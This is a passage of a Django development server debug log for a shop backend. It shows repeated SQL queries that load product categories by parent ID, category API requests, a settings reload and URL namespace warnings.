"shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:19:27,442 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:19:27,447 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:19:27,453 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:19:27,456 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:19:27,460 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:19:27,465 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:19:27,469 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:19:27,476 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:19:27,479 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:19:27,484 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:19:27,489 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:19:27,494 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:19:27,498 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:19:27,505 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:19:27,510 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:19:27,515 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:19:27,520 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:19:27,524 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:19:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:19:27,906 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:19:27,918 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:19:27,924 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:19:27,929 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:19:27,935 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:19:27,939 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:19:27,943 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:19:27,948 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:19:27,952 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:19:27,958 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:19:27,962 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:19:27,966 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:19:27,970 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:19:27,974 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:19:27,980 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:19:27,984 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:19:27,988 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:19:27,992 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:19:27,996 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:19:28,002 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:19:28,006 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:19:28,010 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:19:28,012 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:19:28,015 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:19:28,017 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:19:28,020 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:19:28,022 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:19:28,025 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:19:28,027 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:19:28,029 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:19:28,032 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:19:28,034 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:19:28,037 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:19:28,039 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:19:28,041 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:19:28,044 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:19:28,047 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:19:28,049 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:19:28,051 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:19:28,054 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:19:28,057 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:19:28,061 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:19:28,064 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:19:28,067 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:19:28,071 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:19:28,074 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:19:28] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:19:28] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [27/Dec/2019 07:19:28] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/settings.py changed, reloading. Performing system checks... December 17, 2019 - 11:24:45 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-27 07:20:39,582 utils 31585 139762261739264 (0.006) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-27 07:20:39,586 utils 31585 139762261739264 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-27 07:20:44,344 utils 